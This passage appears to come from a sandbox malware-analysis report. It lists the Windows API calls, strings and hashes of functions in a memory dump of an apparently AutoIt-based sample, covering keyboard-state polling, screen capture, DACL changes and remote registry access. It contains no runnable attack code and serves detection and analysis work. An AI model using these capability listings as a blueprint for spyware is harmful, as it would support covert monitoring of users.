                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                            • String ID: 0
                            • API String ID: 1296962147-4108050209
                            • Opcode ID: 83d823a64b7032375105fc37d8b1e6bec01ff5e6b624f1bea0e5b108dec1643a
                            • Instruction ID: 910811595ccb4b050d429351af4c1333416d3c7bd381bcab11738b210d48c170
                            • Opcode Fuzzy Hash: 83d823a64b7032375105fc37d8b1e6bec01ff5e6b624f1bea0e5b108dec1643a
                            • Instruction Fuzzy Hash: 8C81C171208389AFDB50DF55DC84AABBBE4FF88354F00092DF998A7291D771D941CB92
                            APIs
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BB903
                              • Part of subcall function 000BB8E7: GetLastError.KERNEL32(?,000BB3CB,?,?,?), ref: 000BB90D
                              • Part of subcall function 000BB8E7: GetProcessHeap.KERNEL32(00000008,?,?,000BB3CB,?,?,?), ref: 000BB91C
                              • Part of subcall function 000BB8E7: HeapAlloc.KERNEL32(00000000,?,000BB3CB,?,?,?), ref: 000BB923
                              • Part of subcall function 000BB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BB93A
                              • Part of subcall function 000BB982: GetProcessHeap.KERNEL32(00000008,000BB3E1,00000000,00000000,?,000BB3E1,?), ref: 000BB98E
                              • Part of subcall function 000BB982: HeapAlloc.KERNEL32(00000000,?,000BB3E1,?), ref: 000BB995
                              • Part of subcall function 000BB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BB3E1,?), ref: 000BB9A6
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BB5F7
                            • _memset.LIBCMT ref: 000BB60C
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BB62B
                            • GetLengthSid.ADVAPI32(?), ref: 000BB63C
                            • GetAce.ADVAPI32(?,00000000,?), ref: 000BB679
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BB695
                            • GetLengthSid.ADVAPI32(?), ref: 000BB6B2
                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BB6C1
                            • HeapAlloc.KERNEL32(00000000), ref: 000BB6C8
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BB6E9
                            • CopySid.ADVAPI32(00000000), ref: 000BB6F0
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BB721
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BB747
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BB75B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                            • String ID:
                            • API String ID: 3996160137-0
                            • Opcode ID: aa532e20a95e9e8b1cd23e84b9eb071292b3a2defa9041f1a83d78bd32d9a207
                            • Instruction ID: 607b2b537c91a37019d19a53b2f166d5e577e48ed6f6f912de37c0e356dfcc37
                            • Opcode Fuzzy Hash: aa532e20a95e9e8b1cd23e84b9eb071292b3a2defa9041f1a83d78bd32d9a207
                            • Instruction Fuzzy Hash: E7518C71900209AFDF10DFA4DC85EEEBBB9FF44304F048129F956A72A1DBB09A45CB60
                            APIs
                            • GetDC.USER32(00000000), ref: 000DA2DD
                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 000DA2E9
                            • CreateCompatibleDC.GDI32(?), ref: 000DA2F5
                            • SelectObject.GDI32(00000000,?), ref: 000DA302
                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 000DA356
                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 000DA392
                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 000DA3B6
                            • SelectObject.GDI32(00000006,?), ref: 000DA3BE
                            • DeleteObject.GDI32(?), ref: 000DA3C7
                            • DeleteDC.GDI32(00000006), ref: 000DA3CE
                            • ReleaseDC.USER32(00000000,?), ref: 000DA3D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                            • String ID: (
                            • API String ID: 2598888154-3887548279
                            • Opcode ID: 07a40fcba34bcc20854e6e7e12d792cc573699f1765d4da9b5b76fa7f382b24a
                            • Instruction ID: 5f4a44c1abc1fc10fc94779993657a3a0574d4dbee759896ad59b7b65ab666e4
                            • Opcode Fuzzy Hash: 07a40fcba34bcc20854e6e7e12d792cc573699f1765d4da9b5b76fa7f382b24a
                            • Instruction Fuzzy Hash: 2F514A75A00309EFDB15CFA8DC84EAEBBB9EF49310F14851EF99A97350C771A9418B60
                            APIs
                            • LoadStringW.USER32(00000066,?,00000FFF), ref: 000CD567
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 000CD589
                            • __swprintf.LIBCMT ref: 000CD5DC
                            • _wprintf.LIBCMT ref: 000CD68D
                            • _wprintf.LIBCMT ref: 000CD6AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove
                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2116804098-2391861430
                            • Opcode ID: 185ada4e35ec14af98b7fbc0f42cb2ce85a5b97492529b71a411ba5de059dac7
                            • Instruction ID: 9941d2f6ec214ad72456afe388d7a9df081e3f0c35ed321ddff598e003433aaa
                            • Opcode Fuzzy Hash: 185ada4e35ec14af98b7fbc0f42cb2ce85a5b97492529b71a411ba5de059dac7
                            • Instruction Fuzzy Hash: 91517171900109BADB15FBE0DD42EEEB7B9BF14704F10416AF145B20A2EB716F88DB61
                            APIs
                            • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 000CD37F
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000CD3A0
                            • __swprintf.LIBCMT ref: 000CD3F3
                            • _wprintf.LIBCMT ref: 000CD499
                            • _wprintf.LIBCMT ref: 000CD4B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove
                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2116804098-3420473620
                            • Opcode ID: b1f86094915bc3ee6928bb5a27b6ced2c0b4201a667c944f1ce0eb97247d5e4a
                            • Instruction ID: 9f2fc63ca60147e91a745a1821a9ee6fe552256c383d7645df8a14ef215bb536
                            • Opcode Fuzzy Hash: b1f86094915bc3ee6928bb5a27b6ced2c0b4201a667c944f1ce0eb97247d5e4a
                            • Instruction Fuzzy Hash: A4518071900109BBDB19FBE0DD42EEEB779BF14700F10446AF105A2062EB716F88CB61
                            APIs
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • _memset.LIBCMT ref: 000BAF74
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000BAFA9
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000BAFC5
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000BAFE1
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000BB00B
                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000BB033
                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BB03E
                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BB043
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 1411258926-22481851
                            • Opcode ID: 8b233c16542568a094ea55fda5ae6f003d7b90278bba1a00d8955b5f13131379
                            • Instruction ID: a1cd5aa8ce1f417ce8706df5e0df8194eaf755a0203a90aedf0bee66910bacc9
                            • Opcode Fuzzy Hash: 8b233c16542568a094ea55fda5ae6f003d7b90278bba1a00d8955b5f13131379
                            • Instruction Fuzzy Hash: BA410776C1022DABDF11EBA4DC85DEEB7B8BF18704F404169F945A21A1EB719E44CF90
                            APIs
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                            • API String ID: 3964851224-909552448
                            • Opcode ID: 905412bd89841a448e87cf93e1981bead286b4ed72aab9257b1ca8bec592da94
                            • Instruction ID: d872f77dbae95cddf72fe1209dbfec8e4567be0d0172478564e4cd662368eae6
                            • Opcode Fuzzy Hash: 905412bd89841a448e87cf93e1981bead286b4ed72aab9257b1ca8bec592da94
                            • Instruction Fuzzy Hash: 2441AF341002869FDF44EF05D945AEB3BA1BF15390F644864ECA17B296DB30EE4ADB50
                            APIs
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000C843F
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000C8455
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000C8466
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000C8478
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000C8489
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: SendString$_memmove
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 2279737902-1007645807
                            • Opcode ID: fa5d8ed7273f4f5653f76093e6d12fd58299bed2ff8d660a36c86c5b308e2e0b
                            • Instruction ID: ca8b54b07e015a3603ba4877d06f0619e33f8c5ef5c95492fac43a43eaa54b58
                            • Opcode Fuzzy Hash: fa5d8ed7273f4f5653f76093e6d12fd58299bed2ff8d660a36c86c5b308e2e0b
                            • Instruction Fuzzy Hash: 2C118F61A4025979D724B7A1CC4AEFF7BBCFBD1B00F444929B461E20D6EFA05A44C7B4
                            APIs
                            • timeGetTime.WINMM ref: 000C809C
                              • Part of subcall function 0009E3A5: timeGetTime.WINMM(?,75A8B400,000F6163), ref: 0009E3A9
                            • Sleep.KERNEL32(0000000A), ref: 000C80C8
                            • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 000C80EC
                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 000C810E
                            • SetActiveWindow.USER32 ref: 000C812D
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000C813B
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 000C815A
                            • Sleep.KERNEL32(000000FA), ref: 000C8165
                            • IsWindow.USER32 ref: 000C8171
                            • EndDialog.USER32(00000000), ref: 000C8182
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                            • String ID: BUTTON
                            • API String ID: 1194449130-3405671355
                            • Opcode ID: f4569ed6af71b0c5d2747780cd34a2a17afc676ab84b342163bb37d9faa70a8f
                            • Instruction ID: 82fa609361464583b0cecce9c88a3fb2d6225f1133ee436d3291519c9168b9dd
                            • Opcode Fuzzy Hash: f4569ed6af71b0c5d2747780cd34a2a17afc676ab84b342163bb37d9faa70a8f
                            • Instruction Fuzzy Hash: EC219274204204BFE7225BA1EC8AF6A3BAAF745398F0D4118F96182DB1CFB24D858725
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000F3C64,00000010,00000000,Bad directive syntax error,0011DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 000C32D1
                            • LoadStringW.USER32(00000000,?,000F3C64,00000010), ref: 000C32D8
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • _wprintf.LIBCMT ref: 000C3309
                            • __swprintf.LIBCMT ref: 000C332B
                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000C3395
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 1506413516-4153970271
                            • Opcode ID: 2e1fbd22bda76aeadf040001b995e6d76c0eed2e305fd849b74d975bdea7097c
                            • Instruction ID: ab2a591358b99b21b708e7122a1e94983bcf0c87435d7c82763b7af65442fc06
                            • Opcode Fuzzy Hash: 2e1fbd22bda76aeadf040001b995e6d76c0eed2e305fd849b74d975bdea7097c
                            • Instruction Fuzzy Hash: F0216832840219ABDF11FFD0CC0AEEE7735BF14701F008465F555A10A2EBB2AB58DB61
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 208665112-3771769585
                            • Opcode ID: a2c38f0376363e521030d52e1669fc1868a8799648c20cf469f446c842fc332e
                            • Instruction ID: 2ee343effc000a2a682fbdeea0edafd9b152ddf7a1e539bc7c3a773eb6ee075e
                            • Opcode Fuzzy Hash: a2c38f0376363e521030d52e1669fc1868a8799648c20cf469f446c842fc332e
                            • Instruction Fuzzy Hash: E611B471908115ABDB64A7B0AC4AFEE77BCDF45724F0000A9F44996092EFB0DA818AA5
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                            • String ID:
                            • API String ID: 3566271842-0
                            • Opcode ID: 6b71ef48204d17b6d6fe61702d00fce4721e803033333bfb4705c859ddecf162
                            • Instruction ID: 641ac1f0672fb2b41c77cca947eaddbe52d9b60d34c08b9e2d78ec7497e22e26
                            • Opcode Fuzzy Hash: 6b71ef48204d17b6d6fe61702d00fce4721e803033333bfb4705c859ddecf162
                            • Instruction Fuzzy Hash: 1D711C75900219AFDB14EFA4D888ADEB7B8FF49314F048096E949AB252D770EE40CF90
                            APIs
                            • GetKeyboardState.USER32(?), ref: 000C3908
                            • SetKeyboardState.USER32(?), ref: 000C3973
                            • GetAsyncKeyState.USER32(000000A0), ref: 000C3993
                            • GetKeyState.USER32(000000A0), ref: 000C39AA
                            • GetAsyncKeyState.USER32(000000A1), ref: 000C39D9
                            • GetKeyState.USER32(000000A1), ref: 000C39EA
                            • GetAsyncKeyState.USER32(00000011), ref: 000C3A16
                            • GetKeyState.USER32(00000011), ref: 000C3A24
                            • GetAsyncKeyState.USER32(00000012), ref: 000C3A4D
                            • GetKeyState.USER32(00000012), ref: 000C3A5B
                            • GetAsyncKeyState.USER32(0000005B), ref: 000C3A84
                            • GetKeyState.USER32(0000005B), ref: 000C3A92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 5a865a97195255de898526649214f08c05f65cbc03a5e5e3f9e513393216362c
                            • Instruction ID: cedf79f6d2004abc0919800e8ad007a22f009cff6b86176c5923aeb1345d8127
                            • Opcode Fuzzy Hash: 5a865a97195255de898526649214f08c05f65cbc03a5e5e3f9e513393216362c
                            • Instruction Fuzzy Hash: 2851A420A1478469FB75EBA48811FEEBBF49F11344F08C59ED5C25A1C3DAA49B8CC762
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 000BFB19
                            • GetWindowRect.USER32(00000000,?), ref: 000BFB2B
                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000BFB89
                            • GetDlgItem.USER32(?,00000002), ref: 000BFB94
                            • GetWindowRect.USER32(00000000,?), ref: 000BFBA6
                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000BFBFC
                            • GetDlgItem.USER32(?,000003E9), ref: 000BFC0A
                            • GetWindowRect.USER32(00000000,?), ref: 000BFC1B
                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000BFC5E
                            • GetDlgItem.USER32(?,000003EA), ref: 000BFC6C
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000BFC89
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 000BFC96
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            • Opcode ID: 843ff38bd44427cb131b0fb8273ca0eda1fbf15e98ea254c1f534fa6e7cfdba0
                            • Instruction ID: 645e97847cd4db830724c0063f20df05fc66b2e05acb4243780f2349a29be392
                            • Opcode Fuzzy Hash: 843ff38bd44427cb131b0fb8273ca0eda1fbf15e98ea254c1f534fa6e7cfdba0
                            • Instruction Fuzzy Hash: 92510F71B00209AFDB18CFA9DD95ABEBBBAFB88310F148139F915D7691D7B19D408B10
                            APIs
                              • Part of subcall function 000849CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00084954,00000000), ref: 00084A23
                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0009B85B), ref: 0009B926
                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 0009B9BD
                            • DestroyAcceleratorTable.USER32(00000000), ref: 000FE775
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 000FE7A6
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 000FE7BD
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 000FE7D9
                            • DeleteObject.GDI32(00000000), ref: 000FE7EB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                            • String ID:
                            • API String ID: 641708696-0
                            • Opcode ID: 213242d82be573809fbb9873604f0d28c5881870f37487220602967ee0698eed
